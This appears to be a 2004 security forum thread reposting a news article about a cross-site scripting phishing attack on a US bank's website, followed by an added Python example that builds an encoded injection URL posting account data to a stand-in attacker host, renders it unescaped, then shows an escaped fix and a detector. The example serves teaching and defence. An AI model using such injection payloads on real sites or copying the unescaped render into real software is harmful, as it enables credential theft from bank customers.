UGN Security Forums
#39121 - 12/08/04 03:01 AM Banking site hijacked by fraudsters
Ice Offline
UGN News Staff

Registered: 11/29/02
Posts: 1146
Loc: Canada
Fraudsters have used a clever web-programming trick to turn a legitimate banking site into a tool for stealing account information.

Suntrust, a bank based in Georgia, US, has fallen foul of the deception, according to web security experts who received emails designed to swindle customers.

Researchers at UK-based web-monitoring firm Netcraft received emails claiming to come from Suntrust that ask customers to verify their account information using a link embedded in the message.

But the email was not sent from the bank's own servers and the web page it linked to contained extra characters in the URL address line - added on to the bank’s legitimate web address. So, while the page was hosted by the bank’s servers, hackers had overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.

Decoding these altered elements revealed a link to an alternative server controlled by the hackers. Customers entering their account information onto the overlaid page were inadvertently sending their details to be recorded by the hackers’ web server.

Pass it on

Netcraft engineer Paul Mutton says the "phishing" trick is made worse because it exploits the bank’s own site. "As far as the user is concerned, they are visiting a legitimate site," he says.

Known as a "cross-site scripting vulnerability", the trick allows an outsider to add to and alter a real web page with their own text and links. The problem arises when the code the website operator uses to build the page copies data from the request (here, part of the URL) into the HTML without first escaping or validating it, so outside, or untrusted, data is treated as part of the page.

"If you're web programming, you should really make sure data [entered in a URL] is sanitised," Mutton adds.

Since being informed by Netcraft, Suntrust has modified its site to prevent the trick working. Following a link from one of the phishing emails now produces a genuine web page.

Experts had previously warned that many sites could be vulnerable to cross-site scripting. A report released in September 2004 by UK computer security firm Next Generation Security (NGS) suggested that as many as nine out of 10 bank websites could be open to this type of flaw.

Source: New Scientist
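The reflected cross-site scripting flaw the article describes, as an added example that is not part of the original post, the New Scientist article, or SunTrust's site: a page handler that copies a URL parameter into its HTML, beside the hardened version that entity-encodes it first. The bank host, the parameter name "msg" and the attacker host are hypothetical, and the phishing URL is constructed to match the article's description (the bank's real address with extra characters appended that inject a fake "Account Verification" form posting to a server the attacker controls).

```python
"""Reflected XSS in a URL parameter: vulnerable render beside the hardened one.

Added example, not code from the article or the bank's site. Hosts, the "msg"
parameter and the page layout are hypothetical.
"""
import re
from html import escape
from typing import List
from urllib.parse import parse_qs, urlsplit

# Constructed phishing URL: the bank's legitimate host with a payload appended
# to a query parameter. Decoded, the parameter is a <form> whose action points
# at the attacker's server, dressed up as an "Account Verification" box.
PHISH_URL = (
    "https://www.example-bank.test/login?msg="
    "%3Cform%20action%3D%22https%3A%2F%2Fattacker.test%2Fcollect%22%3E"
    "Account%20Verification%3A%20%3Cinput%20name%3D%22acct%22%3E%3C%2Fform%3E"
)


def _msg_param(url: str) -> str:
    """Extracts the decoded 'msg' query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get("msg", [""])[0]


def vulnerable_page(url: str) -> str:
    """Builds the page by pasting the raw parameter into the HTML.

    Because the value is not escaped, any markup in the URL becomes part of
    the page served from the bank's own host: reflected cross-site scripting.
    """
    msg = _msg_param(url)
    return f"<html><body><h1>Bank login</h1><p>{msg}</p></body></html>"


def hardened_page(url: str) -> str:
    """Same page, but the untrusted value is HTML-entity encoded before use.

    '<', '>', '&' and quotes become entities, so the browser renders the
    payload as literal text instead of interpreting it as markup.
    """
    msg = _msg_param(url)
    return (
        "<html><body><h1>Bank login</h1>"
        f"<p>{escape(msg, quote=True)}</p></body></html>"
    )


def injected_form_actions(page: str) -> List[str]:
    """Returns the action URLs of every <form> in the rendered page.

    A crude detector for the overlay the article describes: a form on the
    bank's page whose action points at a server the bank does not control.
    """
    return re.findall(r'<form[^>]*action="([^"]*)"', page)


if __name__ == "__main__":
    print("vulnerable:", injected_form_actions(vulnerable_page(PHISH_URL)))
    print("hardened:  ", injected_form_actions(hardened_page(PHISH_URL)))
```

Running the block shows the vulnerable render carrying a form that posts to attacker.test while the hardened render carries none. Entity-encoding at the point where the value is written into HTML is the general fix Mutton's "sanitise the data" advice points at; a value that ends up inside a URL or a script block needs the encoding appropriate to that context instead, and a Content-Security-Policy header limits what an injected form or script can do if an encoding step is missed.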
#39122 - 12/08/04 07:36 AM Re: Banking site hijacked by fraudsters
Gremelin Online

Community Owner

Registered: 02/28/02
Posts: 7194
Loc: Portland, OR; USA
I've been getting these emails for years... It's sad though as I don't bank with them lol...